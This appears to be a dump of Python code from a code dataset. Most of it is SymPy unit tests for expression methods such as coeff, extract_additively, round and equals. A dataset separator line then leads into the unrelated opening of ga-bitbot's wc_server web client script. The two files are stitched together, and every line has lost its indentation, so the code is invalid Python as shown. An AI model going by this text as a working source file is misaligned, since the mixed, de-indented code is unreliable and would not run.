assert x.as_coeff_add() == (0, (x,))
assert (x - 1).as_coeff_add() == (-1, (x,))
assert (x + 1).as_coeff_add() == (1, (x,))
assert (x + 2).as_coeff_add() == (2, (x,))
assert (x + y).as_coeff_add(y) == (x, (y,))
assert (3*x).as_coeff_add(y) == (3*x, ())
# don't do expansion
e = (x + y)**2
assert e.as_coeff_add(y) == (0, (e,))
def test_as_coeff_mul():
assert S(2).as_coeff_mul() == (2, ())
assert S(3.0).as_coeff_mul() == (1, (S(3.0),))
assert S(-3.0).as_coeff_mul() == (-1, (S(3.0),))
assert S(-3.0).as_coeff_mul(rational=False) == (-S(3.0), ())
assert x.as_coeff_mul() == (1, (x,))
assert (-x).as_coeff_mul() == (-1, (x,))
assert (2*x).as_coeff_mul() == (2, (x,))
assert (x*y).as_coeff_mul(y) == (x, (y,))
assert (3 + x).as_coeff_mul() == (1, (3 + x,))
assert (3 + x).as_coeff_mul(y) == (3 + x, ())
# don't do expansion
e = exp(x + y)
assert e.as_coeff_mul(y) == (1, (e,))
e = 2**(x + y)
assert e.as_coeff_mul(y) == (1, (e,))
assert (1.1*x).as_coeff_mul(rational=False) == (1.1, (x,))
assert (1.1*x).as_coeff_mul() == (1, (1.1, x))
assert (-oo*x).as_coeff_mul(rational=True) == (-1, (oo, x))
def test_as_coeff_exponent():
assert (3*x**4).as_coeff_exponent(x) == (3, 4)
assert (2*x**3).as_coeff_exponent(x) == (2, 3)
assert (4*x**2).as_coeff_exponent(x) == (4, 2)
assert (6*x**1).as_coeff_exponent(x) == (6, 1)
assert (3*x**0).as_coeff_exponent(x) == (3, 0)
assert (2*x**0).as_coeff_exponent(x) == (2, 0)
assert (1*x**0).as_coeff_exponent(x) == (1, 0)
assert (0*x**0).as_coeff_exponent(x) == (0, 0)
assert (-1*x**0).as_coeff_exponent(x) == (-1, 0)
assert (-2*x**0).as_coeff_exponent(x) == (-2, 0)
assert (2*x**3 + pi*x**3).as_coeff_exponent(x) == (2 + pi, 3)
assert (x*log(2)/(2*x + pi*x)).as_coeff_exponent(x) == \
(log(2)/(2 + pi), 0)
# issue 4784
D = Derivative
f = Function('f')
fx = D(f(x), x)
assert fx.as_coeff_exponent(f(x)) == (fx, 0)
def test_extractions():
assert ((x*y)**3).extract_multiplicatively(x**2 * y) == x*y**2
assert ((x*y)**3).extract_multiplicatively(x**4 * y) is None
assert (2*x).extract_multiplicatively(2) == x
assert (2*x).extract_multiplicatively(3) is None
assert (2*x).extract_multiplicatively(-1) is None
assert (Rational(1, 2)*x).extract_multiplicatively(3) == x/6
assert (sqrt(x)).extract_multiplicatively(x) is None
assert (sqrt(x)).extract_multiplicatively(1/x) is None
assert x.extract_multiplicatively(-x) is None
assert ((x*y)**3).extract_additively(1) is None
assert (x + 1).extract_additively(x) == 1
assert (x + 1).extract_additively(2*x) is None
assert (x + 1).extract_additively(-x) is None
assert (-x + 1).extract_additively(2*x) is None
assert (2*x + 3).extract_additively(x) == x + 3
assert (2*x + 3).extract_additively(2) == 2*x + 1
assert (2*x + 3).extract_additively(3) == 2*x
assert (2*x + 3).extract_additively(-2) is None
assert (2*x + 3).extract_additively(3*x) is None
assert (2*x + 3).extract_additively(2*x) == 3
assert x.extract_additively(0) == x
assert S(2).extract_additively(x) is None
assert S(2.).extract_additively(2) == S.Zero
assert S(2*x + 3).extract_additively(x + 1) == x + 2
assert S(2*x + 3).extract_additively(y + 1) is None
assert S(2*x - 3).extract_additively(x + 1) is None
assert S(2*x - 3).extract_additively(y + z) is None
assert ((a + 1)*x*4 + y).extract_additively(x).expand() == \
4*a*x + 3*x + y
assert ((a + 1)*x*4 + 3*y).extract_additively(x + 2*y).expand() == \
4*a*x + 3*x + y
assert (y*(x + 1)).extract_additively(x + 1) is None
assert ((y + 1)*(x + 1) + 3).extract_additively(x + 1) == \
y*(x + 1) + 3
assert ((x + y)*(x + 1) + x + y + 3).extract_additively(x + y) == \
x*(x + y) + 3
assert (x + y + 2*((x + y)*(x + 1)) + 3).extract_additively((x + y)*(x + 1)) == \
x + y + (x + 1)*(x + y) + 3
assert ((y + 1)*(x + 2*y + 1) + 3).extract_additively(y + 1) == \
(x + 2*y)*(y + 1) + 3
n = Symbol("n", integer=True)
assert (Integer(-3)).could_extract_minus_sign() is True
assert (-n*x + x).could_extract_minus_sign() != \
(n*x - x).could_extract_minus_sign()
assert (x - y).could_extract_minus_sign() != \
(-x + y).could_extract_minus_sign()
assert (1 - x - y).could_extract_minus_sign() is True
assert (1 - x + y).could_extract_minus_sign() is False
assert ((-x - x*y)/y).could_extract_minus_sign() is True
assert (-(x + x*y)/y).could_extract_minus_sign() is True
assert ((x + x*y)/(-y)).could_extract_minus_sign() is True
assert ((x + x*y)/y).could_extract_minus_sign() is False
assert (x*(-x - x**3)).could_extract_minus_sign() is True
assert ((-x - y)/(x + y)).could_extract_minus_sign() is True
# The results of each of these will vary on different machines, e.g.
# the first one might be False and the other (then) is true or vice versa,
# so both are included.
assert ((-x - y)/(x - y)).could_extract_minus_sign() is False or \
((-x - y)/(y - x)).could_extract_minus_sign() is False
assert (x - y).could_extract_minus_sign() is False
assert (-x + y).could_extract_minus_sign() is True
def test_coeff():
assert (x + 1).coeff(x + 1) == 1
assert (3*x).coeff(0) == 0
assert (z*(1 + x)*x**2).coeff(1 + x) == z*x**2
assert (1 + 2*x*x**(1 + x)).coeff(x*x**(1 + x)) == 2
assert (1 + 2*x**(y + z)).coeff(x**(y + z)) == 2
assert (3 + 2*x + 4*x**2).coeff(1) == 0
assert (3 + 2*x + 4*x**2).coeff(-1) == 0
assert (3 + 2*x + 4*x**2).coeff(x) == 2
assert (3 + 2*x + 4*x**2).coeff(x**2) == 4
assert (3 + 2*x + 4*x**2).coeff(x**3) == 0
assert (-x/8 + x*y).coeff(x) == -S(1)/8 + y
assert (-x/8 + x*y).coeff(-x) == S(1)/8
assert (4*x).coeff(2*x) == 0
assert (2*x).coeff(2*x) == 1
assert (-oo*x).coeff(x*oo) == -1
assert (10*x).coeff(x, 0) == 0
assert (10*x).coeff(10*x, 0) == 0
n1, n2 = symbols('n1 n2', commutative=False)
assert (n1*n2).coeff(n1) == 1
assert (n1*n2).coeff(n2) == n1
assert (n1*n2 + x*n1).coeff(n1) == 1 # 1*n1*(n2+x)
assert (n2*n1 + x*n1).coeff(n1) == n2 + x
assert (n2*n1 + x*n1**2).coeff(n1) == n2
assert (n1**x).coeff(n1) == 0
assert (n1*n2 + n2*n1).coeff(n1) == 0
assert (2*(n1 + n2)*n2).coeff(n1 + n2, right=1) == n2
assert (2*(n1 + n2)*n2).coeff(n1 + n2, right=0) == 2
f = Function('f')
assert (2*f(x) + 3*f(x).diff(x)).coeff(f(x)) == 2
expr = z*(x + y)**2
expr2 = z*(x + y)**2 + z*(2*x + 2*y)**2
assert expr.coeff(z) == (x + y)**2
assert expr.coeff(x + y) == 0
assert expr2.coeff(z) == (x + y)**2 + (2*x + 2*y)**2
assert (x + y + 3*z).coeff(1) == x + y
assert (-x + 2*y).coeff(-1) == x
assert (x - 2*y).coeff(-1) == 2*y
assert (3 + 2*x + 4*x**2).coeff(1) == 0
assert (-x - 2*y).coeff(2) == -y
assert (x + sqrt(2)*x).coeff(sqrt(2)) == x
assert (3 + 2*x + 4*x**2).coeff(x) == 2
assert (3 + 2*x + 4*x**2).coeff(x**2) == 4
assert (3 + 2*x + 4*x**2).coeff(x**3) == 0
assert (z*(x + y)**2).coeff((x + y)**2) == z
assert (z*(x + y)**2).coeff(x + y) == 0
assert (2 + 2*x + (x + 1)*y).coeff(x + 1) == y
assert (x + 2*y + 3).coeff(1) == x
assert (x + 2*y + 3).coeff(x, 0) == 2*y + 3
assert (x**2 + 2*y + 3*x).coeff(x**2, 0) == 2*y + 3*x
assert x.coeff(0, 0) == 0
assert x.coeff(x, 0) == 0
n, m, o, l = symbols('n m o l', commutative=False)
assert n.coeff(n) == 1
assert y.coeff(n) == 0
assert (3*n).coeff(n) == 3
assert (2 + n).coeff(x*m) == 0
assert (2*x*n*m).coeff(x) == 2*n*m
assert (2 + n).coeff(x*m*n + y) == 0
assert (2*x*n*m).coeff(3*n) == 0
assert (n*m + m*n*m).coeff(n) == 1 + m
assert (n*m + m*n*m).coeff(n, right=True) == m # = (1 + m)*n*m
assert (n*m + m*n).coeff(n) == 0
assert (n*m + o*m*n).coeff(m*n) == o
assert (n*m + o*m*n).coeff(m*n, right=1) == 1
assert (n*m + n*m*n).coeff(n*m, right=1) == 1 + n # = n*m*(n + 1)
def test_coeff2():
r, kappa = symbols('r, kappa')
psi = Function("psi")
g = 1/r**2 * (2*r*psi(r).diff(r, 1) + r**2 * psi(r).diff(r, 2))
g = g.expand()
assert g.coeff((psi(r).diff(r))) == 2/r
def test_coeff2_0():
r, kappa = symbols('r, kappa')
psi = Function("psi")
g = 1/r**2 * (2*r*psi(r).diff(r, 1) + r**2 * psi(r).diff(r, 2))
g = g.expand()
assert g.coeff(psi(r).diff(r, 2)) == 1
def test_coeff_expand():
expr = z*(x + y)**2
expr2 = z*(x + y)**2 + z*(2*x + 2*y)**2
assert expr.coeff(z) == (x + y)**2
assert expr2.coeff(z) == (x + y)**2 + (2*x + 2*y)**2
def test_integrate():
assert x.integrate(x) == x**2/2
assert x.integrate((x, 0, 1)) == S(1)/2
def test_as_base_exp():
assert x.as_base_exp() == (x, S.One)
assert (x*y*z).as_base_exp() == (x*y*z, S.One)
assert (x + y + z).as_base_exp() == (x + y + z, S.One)
assert ((x + y)**z).as_base_exp() == (x + y, z)
def test_issue_4963():
assert hasattr(Mul(x, y), "is_commutative")
assert hasattr(Mul(x, y, evaluate=False), "is_commutative")
assert hasattr(Pow(x, y), "is_commutative")
assert hasattr(Pow(x, y, evaluate=False), "is_commutative")
expr = Mul(Pow(2, 2, evaluate=False), 3, evaluate=False) + 1
assert hasattr(expr, "is_commutative")
def test_action_verbs():
assert nsimplify((1/(exp(3*pi*x/5) + 1))) == \
(1/(exp(3*pi*x/5) + 1)).nsimplify()
assert ratsimp(1/x + 1/y) == (1/x + 1/y).ratsimp()
assert trigsimp(log(x), deep=True) == (log(x)).trigsimp(deep=True)
assert radsimp(1/(2 + sqrt(2))) == (1/(2 + sqrt(2))).radsimp()
assert powsimp(x**y*x**z*y**z, combine='all') == \
(x**y*x**z*y**z).powsimp(combine='all')
assert simplify(x**y*x**z*y**z) == (x**y*x**z*y**z).simplify()
assert together(1/x + 1/y) == (1/x + 1/y).together()
assert collect(a*x**2 + b*x**2 + a*x - b*x + c, x) == \
(a*x**2 + b*x**2 + a*x - b*x + c).collect(x)
assert apart(y/(y + 2)/(y + 1), y) == (y/(y + 2)/(y + 1)).apart(y)
assert combsimp(y/(x + 2)/(x + 1)) == (y/(x + 2)/(x + 1)).combsimp()
assert factor(x**2 + 5*x + 6) == (x**2 + 5*x + 6).factor()
assert refine(sqrt(x**2)) == sqrt(x**2).refine()
assert cancel((x**2 + 5*x + 6)/(x + 2)) == ((x**2 + 5*x + 6)/(x + 2)).cancel()
def test_as_powers_dict():
assert x.as_powers_dict() == {x: 1}
assert (x**y*z).as_powers_dict() == {x: y, z: 1}
assert Mul(2, 2, evaluate=False).as_powers_dict() == {S(2): S(2)}
assert (x*y).as_powers_dict()[z] == 0
assert (x + y).as_powers_dict()[z] == 0
def test_as_coefficients_dict():
check = [S(1), x, y, x*y, 1]
assert [Add(3*x, 2*x, y, 3).as_coefficients_dict()[i] for i in check] == \
[3, 5, 1, 0, 3]
assert [(3*x*y).as_coefficients_dict()[i] for i in check] == \
[0, 0, 0, 3, 0]
assert (3.0*x*y).as_coefficients_dict()[3.0*x*y] == 1
def test_args_cnc():
A = symbols('A', commutative=False)
assert (x + A).args_cnc() == \
[[], [x + A]]
assert (x + a).args_cnc() == \
[[a + x], []]
assert (x*a).args_cnc() == \
[[a, x], []]
assert (x*y*A*(A + 1)).args_cnc(cset=True) == \
[set([x, y]), [A, 1 + A]]
assert Mul(x, x, evaluate=False).args_cnc(cset=True, warn=False) == \
[set([x]), []]
assert Mul(x, x**2, evaluate=False).args_cnc(cset=True, warn=False) == \
[set([x, x**2]), []]
raises(ValueError, lambda: Mul(x, x, evaluate=False).args_cnc(cset=True))
assert Mul(x, y, x, evaluate=False).args_cnc() == \
[[x, y, x], []]
# always split -1 from leading number
assert (-1.*x).args_cnc() == [[-1, 1.0, x], []]
def test_new_rawargs():
n = Symbol('n', commutative=False)
a = x + n
assert a.is_commutative is False
assert a._new_rawargs(x).is_commutative
assert a._new_rawargs(x, y).is_commutative
assert a._new_rawargs(x, n).is_commutative is False
assert a._new_rawargs(x, y, n).is_commutative is False
m = x*n
assert m.is_commutative is False
assert m._new_rawargs(x).is_commutative
assert m._new_rawargs(n).is_commutative is False
assert m._new_rawargs(x, y).is_commutative
assert m._new_rawargs(x, n).is_commutative is False
assert m._new_rawargs(x, y, n).is_commutative is False
assert m._new_rawargs(x, n, reeval=False).is_commutative is False
assert m._new_rawargs(S.One) is S.One
def test_issue_5226():
assert Add(evaluate=False) == 0
assert Mul(evaluate=False) == 1
assert Mul(x + y, evaluate=False).is_Add
def test_free_symbols():
# free_symbols should return the free symbols of an object
assert S(1).free_symbols == set()
assert (x).free_symbols == set([x])
assert Integral(x, (x, 1, y)).free_symbols == set([y])
assert (-Integral(x, (x, 1, y))).free_symbols == set([y])
assert meter.free_symbols == set()
assert (meter**x).free_symbols == set([x])
def test_issue_5300():
x = Symbol('x', commutative=False)
assert x*sqrt(2)/sqrt(6) == x*sqrt(3)/3
def test_as_coeff_Mul():
assert Integer(3).as_coeff_Mul() == (Integer(3), Integer(1))
assert Rational(3, 4).as_coeff_Mul() == (Rational(3, 4), Integer(1))
assert Float(5.0).as_coeff_Mul() == (Float(5.0), Integer(1))
assert (Integer(3)*x).as_coeff_Mul() == (Integer(3), x)
assert (Rational(3, 4)*x).as_coeff_Mul() == (Rational(3, 4), x)
assert (Float(5.0)*x).as_coeff_Mul() == (Float(5.0), x)
assert (Integer(3)*x*y).as_coeff_Mul() == (Integer(3), x*y)
assert (Rational(3, 4)*x*y).as_coeff_Mul() == (Rational(3, 4), x*y)
assert (Float(5.0)*x*y).as_coeff_Mul() == (Float(5.0), x*y)
assert (x).as_coeff_Mul() == (S.One, x)
assert (x*y).as_coeff_Mul() == (S.One, x*y)
assert (-oo*x).as_coeff_Mul(rational=True) == (-1, oo*x)
def test_as_coeff_Add():
assert Integer(3).as_coeff_Add() == (Integer(3), Integer(0))
assert Rational(3, 4).as_coeff_Add() == (Rational(3, 4), Integer(0))
assert Float(5.0).as_coeff_Add() == (Float(5.0), Integer(0))
assert (Integer(3) + x).as_coeff_Add() == (Integer(3), x)
assert (Rational(3, 4) + x).as_coeff_Add() == (Rational(3, 4), x)
assert (Float(5.0) + x).as_coeff_Add() == (Float(5.0), x)
assert (Integer(3) + x + y).as_coeff_Add() == (Integer(3), x + y)
assert (Rational(3, 4) + x + y).as_coeff_Add() == (Rational(3, 4), x + y)
assert (Float(5.0) + x + y).as_coeff_Add() == (Float(5.0), x + y)
assert (x).as_coeff_Add() == (S.Zero, x)
assert (x*y).as_coeff_Add() == (S.Zero, x*y)
def test_expr_sorting():
f, g = symbols('f,g', cls=Function)
exprs = [1/x**2, 1/x, sqrt(sqrt(x)), sqrt(x), x, sqrt(x)**3, x**2]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [x, 2*x, 2*x**2, 2*x**3, x**n, 2*x**n, sin(x), sin(x)**n,
sin(x**2), cos(x), cos(x**2), tan(x)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [x + 1, x**2 + x + 1, x**3 + x**2 + x + 1]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [S(4), x - 3*I/2, x + 3*I/2, x - 4*I + 1, x + 4*I + 1]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [f(1), f(2), f(3), f(1, 2, 3), g(1), g(2), g(3), g(1, 2, 3)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [f(x), g(x), exp(x), sin(x), cos(x), factorial(x)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [Tuple(x, y), Tuple(x, z), Tuple(x, y, z)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [[3], [1, 2]]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [[1, 2], [2, 3]]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [[1, 2], [1, 2, 3]]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [{x: -y}, {x: y}]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [set([1]), set([1, 2])]
assert sorted(exprs, key=default_sort_key) == exprs
a, b = exprs = [Dummy('x'), Dummy('x')]
assert sorted([b, a], key=default_sort_key) == exprs
def test_as_ordered_factors():
f, g = symbols('f,g', cls=Function)
assert x.as_ordered_factors() == [x]
assert (2*x*x**n*sin(x)*cos(x)).as_ordered_factors() \
== [Integer(2), x, x**n, sin(x), cos(x)]
args = [f(1), f(2), f(3), f(1, 2, 3), g(1), g(2), g(3), g(1, 2, 3)]
expr = Mul(*args)
assert expr.as_ordered_factors() == args
A, B = symbols('A,B', commutative=False)
assert (A*B).as_ordered_factors() == [A, B]
assert (B*A).as_ordered_factors() == [B, A]
def test_as_ordered_terms():
f, g = symbols('f,g', cls=Function)
assert x.as_ordered_terms() == [x]
assert (sin(x)**2*cos(x) + sin(x)*cos(x)**2 + 1).as_ordered_terms() \
== [sin(x)**2*cos(x), sin(x)*cos(x)**2, 1]
args = [f(1), f(2), f(3), f(1, 2, 3), g(1), g(2), g(3), g(1, 2, 3)]
expr = Add(*args)
assert expr.as_ordered_terms() == args
assert (1 + 4*sqrt(3)*pi*x).as_ordered_terms() == [4*pi*x*sqrt(3), 1]
assert ( 2 + 3*I).as_ordered_terms() == [2, 3*I]
assert (-2 + 3*I).as_ordered_terms() == [-2, 3*I]
assert ( 2 - 3*I).as_ordered_terms() == [2, -3*I]
assert (-2 - 3*I).as_ordered_terms() == [-2, -3*I]
assert ( 4 + 3*I).as_ordered_terms() == [4, 3*I]
assert (-4 + 3*I).as_ordered_terms() == [-4, 3*I]
assert ( 4 - 3*I).as_ordered_terms() == [4, -3*I]
assert (-4 - 3*I).as_ordered_terms() == [-4, -3*I]
f = x**2*y**2 + x*y**4 + y + 2
assert f.as_ordered_terms(order="lex") == [x**2*y**2, x*y**4, y, 2]
assert f.as_ordered_terms(order="grlex") == [x*y**4, x**2*y**2, y, 2]
assert f.as_ordered_terms(order="rev-lex") == [2, y, x*y**4, x**2*y**2]
assert f.as_ordered_terms(order="rev-grlex") == [2, y, x**2*y**2, x*y**4]
def test_sort_key_atomic_expr():
from sympy.physics.units import m, s
assert sorted([-m, s], key=lambda arg: arg.sort_key()) == [-m, s]
def test_issue_4199():
# first subs and limit gives NaN
a = x/y
assert a._eval_interval(x, 0, oo)._eval_interval(y, oo, 0) is S.NaN
# second subs and limit gives NaN
assert a._eval_interval(x, 0, oo)._eval_interval(y, 0, oo) is S.NaN
# difference gives S.NaN
a = x - y
assert a._eval_interval(x, 1, oo)._eval_interval(y, oo, 1) is S.NaN
raises(ValueError, lambda: x._eval_interval(x, None, None))
a = -y*Heaviside(x - y)
assert a._eval_interval(x, -oo, oo) == -y
assert a._eval_interval(x, oo, -oo) == y
def test_primitive():
assert (3*(x + 1)**2).primitive() == (3, (x + 1)**2)
assert (6*x + 2).primitive() == (2, 3*x + 1)
assert (x/2 + 3).primitive() == (S(1)/2, x + 6)
eq = (6*x + 2)*(x/2 + 3)
assert eq.primitive()[0] == 1
eq = (2 + 2*x)**2
assert eq.primitive()[0] == 1
assert (4.0*x).primitive() == (1, 4.0*x)
assert (4.0*x + y/2).primitive() == (S.Half, 8.0*x + y)
assert (-2*x).primitive() == (2, -x)
assert Add(5*z/7, 0.5*x, 3*y/2, evaluate=False).primitive() == \
(S(1)/14, 7.0*x + 21*y + 10*z)
for i in [S.Infinity, S.NegativeInfinity, S.ComplexInfinity]:
assert (i + x/3).primitive() == \
(S(1)/3, i + x)
assert (S.Infinity + 2*x/3 + 4*y/7).primitive() == \
(S(1)/21, 14*x + 12*y + oo)
assert S.Zero.primitive() == (S.One, S.Zero)
def test_issue_5843():
a = 1 + x
assert (2*a).extract_multiplicatively(a) == 2
assert (4*a).extract_multiplicatively(2*a) == 2
assert ((3*a)*(2*a)).extract_multiplicatively(a) == 6*a
def test_is_constant():
from sympy.solvers.solvers import checksol
Sum(x, (x, 1, 10)).is_constant() is True
Sum(x, (x, 1, n)).is_constant() is False
Sum(x, (x, 1, n)).is_constant(y) is True
Sum(x, (x, 1, n)).is_constant(n) is False
Sum(x, (x, 1, n)).is_constant(x) is True
eq = a*cos(x)**2 + a*sin(x)**2 - a
eq.is_constant() is True
assert eq.subs({x: pi, a: 2}) == eq.subs({x: pi, a: 3}) == 0
assert x.is_constant() is False
assert x.is_constant(y) is True
assert checksol(x, x, Sum(x, (x, 1, n))) is False
assert checksol(x, x, Sum(x, (x, 1, n))) is False
f = Function('f')
assert checksol(x, x, f(x)) is False
p = symbols('p', positive=True)
assert Pow(x, S(0), evaluate=False).is_constant() is True # == 1
assert Pow(S(0), x, evaluate=False).is_constant() is False # == 0 or 1
assert Pow(S(0), p, evaluate=False).is_constant() is True # == 1
assert (2**x).is_constant() is False
assert Pow(S(2), S(3), evaluate=False).is_constant() is True
z1, z2 = symbols('z1 z2', zero=True)
assert (z1 + 2*z2).is_constant() is True
assert meter.is_constant() is True
assert (3*meter).is_constant() is True
assert (x*meter).is_constant() is False
def test_equals():
assert (-3 - sqrt(5) + (-sqrt(10)/2 - sqrt(2)/2)**2).equals(0)
assert (x**2 - 1).equals((x + 1)*(x - 1))
assert (cos(x)**2 + sin(x)**2).equals(1)
assert (a*cos(x)**2 + a*sin(x)**2).equals(a)
r = sqrt(2)
assert (-1/(r + r*x) + 1/r/(1 + x)).equals(0)
assert factorial(x + 1).equals((x + 1)*factorial(x))
assert sqrt(3).equals(2*sqrt(3)) is False
assert (sqrt(5)*sqrt(3)).equals(sqrt(3)) is False
assert (sqrt(5) + sqrt(3)).equals(0) is False
assert (sqrt(5) + pi).equals(0) is False
assert meter.equals(0) is False
assert (3*meter**2).equals(0) is False
eq = -(-1)**(S(3)/4)*6**(S(1)/4) + (-6)**(S(1)/4)*I
if eq != 0: # if canonicalization makes this zero, skip the test
assert eq.equals(0)
assert sqrt(x).equals(0) is False
# from integrate(x*sqrt(1 + 2*x), x);
# diff is zero only when assumptions allow
i = 2*sqrt(2)*x**(S(5)/2)*(1 + 1/(2*x))**(S(5)/2)/5 + \
2*sqrt(2)*x**(S(3)/2)*(1 + 1/(2*x))**(S(5)/2)/(-6 - 3/x)
ans = sqrt(2*x + 1)*(6*x**2 + x - 1)/15
diff = i - ans
assert diff.equals(0) is False
assert diff.subs(x, -S.Half/2) == 7*sqrt(2)/120
# there are regions for x for which the expression is True, for
# example, when x < -1/2 or x > 0 the expression is zero
p = Symbol('p', positive=True)
assert diff.subs(x, p).equals(0) is True
assert diff.subs(x, -1).equals(0) is True
# prove via minimal_polynomial or self-consistency
eq = sqrt(1 + sqrt(3)) + sqrt(3 + 3*sqrt(3)) - sqrt(10 + 6*sqrt(3))
assert eq.equals(0)
q = 3**Rational(1, 3) + 3
p = expand(q**3)**Rational(1, 3)
assert (p - q).equals(0)
# issue 6829
# eq = q*x + q/4 + x**4 + x**3 + 2*x**2 - S(1)/3
# z = eq.subs(x, solve(eq, x)[0])
q = symbols('q')
z = (q*(-sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12)/2 - sqrt((2*q - S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/6)/2 - S(1)/4) + q/4 + (-sqrt(-2*(-(q
- S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) - S(13)/12)/2 - sqrt((2*q
- S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/6)/2 - S(1)/4)**4 + (-sqrt(-2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/12)/2 - sqrt((2*q -
S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/6)/2 - S(1)/4)**3 + 2*(-sqrt(-2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/12)/2 - sqrt((2*q -
S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/6)/2 - S(1)/4)**2 - S(1)/3)
assert z.equals(0)
def test_random():
from sympy import posify, lucas
assert posify(x)[0]._random() is not None
assert lucas(n)._random(2, -2, 0, -1, 1) is None
def test_round():
from sympy.abc import x
assert Float('0.1249999').round(2) == 0.12
d20 = 12345678901234567890
ans = S(d20).round(2)
assert ans.is_Float and ans == d20
ans = S(d20).round(-2)
assert ans.is_Float and ans == 12345678901234567900
assert S('1/7').round(4) == 0.1429
assert S('.[12345]').round(4) == 0.1235
assert S('.1349').round(2) == 0.13
n = S(12345)
ans = n.round()
assert ans.is_Float
assert ans == n
ans = n.round(1)
assert ans.is_Float
assert ans == n
ans = n.round(4)
assert ans.is_Float
assert ans == n
assert n.round(-1) == 12350
r = n.round(-4)
assert r == 10000
# in fact, it should equal many values since __eq__
# compares at equal precision
assert all(r == i for i in range(9984, 10049))
assert n.round(-5) == 0
assert (pi + sqrt(2)).round(2) == 4.56
assert (10*(pi + sqrt(2))).round(-1) == 50
raises(TypeError, lambda: round(x + 2, 2))
assert S(2.3).round(1) == 2.3
e = S(12.345).round(2)
assert e == round(12.345, 2)
assert type(e) is Float
assert (Float(.3, 3) + 2*pi).round() == 7
assert (Float(.3, 3) + 2*pi*100).round() == 629
assert (Float(.03, 3) + 2*pi/100).round(5) == 0.09283
assert (Float(.03, 3) + 2*pi/100).round(4) == 0.0928
assert (pi + 2*E*I).round() == 3 + 5*I
assert S.Zero.round() == 0
a = (Add(1, Float('1.' + '9'*27, ''), evaluate=0))
assert a.round(10) == Float('3.0000000000', '')
assert a.round(25) == Float('3.0000000000000000000000000', '')
assert a.round(26) == Float('3.00000000000000000000000000', '')
assert a.round(27) == Float('2.999999999999999999999999999', '')
assert a.round(30) == Float('2.999999999999999999999999999', '')
raises(TypeError, lambda: x.round())
# exact magnitude of 10
assert str(S(1).round()) == '1.'
assert str(S(100).round()) == '100.'
# applied to real and imaginary portions
assert (2*pi + E*I).round() == 6 + 3*I
assert (2*pi + I/10).round() == 6
assert (pi/10 + 2*I).round() == 2*I
# the lhs re and im parts are Float with dps of 2
# and those on the right have dps of 15 so they won't compare
# equal unless we use string or compare components (which will
# then coerce the floats to the same precision) or re-create
# the floats
assert str((pi/10 + E*I).round(2)) == '0.31 + 2.72*I'
assert (pi/10 + E*I).round(2).as_real_imag() == (0.31, 2.72)
assert (pi/10 + E*I).round(2) == Float(0.31, 2) + I*Float(2.72, 3)
# issue 6914
assert (I**(I + 3)).round(3) == Float('-0.208', '')*I
# issue 7961
assert str(S(0.006).round(2)) == '0.01'
assert str(S(0.00106).round(4)) == '0.0011'
# issue 8147
assert S.NaN.round() == S.NaN
assert S.Infinity.round() == S.Infinity
assert S.NegativeInfinity.round() == S.NegativeInfinity
assert S.ComplexInfinity.round() == S.ComplexInfinity
def test_round_exception_nostr():
# Don't use the string form of the expression in the round exception, as
# it's too slow
s = Symbol('bad')
try:
s.round()
except TypeError as e:
assert 'bad' not in str(e)
else:
# Did not raise
raise AssertionError("Did not raise")
def test_extract_branch_factor():
assert exp_polar(2.0*I*pi).extract_branch_factor() == (1, 1)
def test_identity_removal():
assert Add.make_args(x + 0) == (x,)
assert Mul.make_args(x*1) == (x,)
def test_float_0():
assert Float(0.0) + 1 == Float(1.0)
@XFAIL
def test_float_0_fail():
assert Float(0.0)*x == Float(0.0)
assert (x + Float(0.0)).is_Add
def test_issue_6325():
ans = (b**2 + z**2 - (b*(a + b*t) + z*(c + t*z))**2/(
(a + b*t)**2 + (c + t*z)**2))/sqrt((a + b*t)**2 + (c + t*z)**2)
e = sqrt((a + b*t)**2 + (c + z*t)**2)
assert diff(e, t, 2) == ans
e.diff(t, 2) == ans
assert diff(e, t, 2, simplify=False) != ans
def test_issue_7426():
f1 = a % c
f2 = x % z
assert f1.equals(f2) == False | unknown | codeparrot/codeparrot-clean | ||
"""
wc_server v0.01
web client server
Copyright 2011 Brian Monkaba
This file is part of ga-bitbot.
ga-bitbot is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
ga-bitbot is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with ga-bitbot. If not, see <http://www.gnu.org/licenses/>.
"""
#
# server provides a web based client interface
#
__appversion__ = "0.01a"
print "Genetic Bitcoin Web Client Server v%s"%__appversion__
# connect to the xml server
#
import gene_server_config
import xmlrpclib
import json
import time
import socket
import paths
from bottle import route, run, static_file, redirect
#define the server port
PORT = 8080
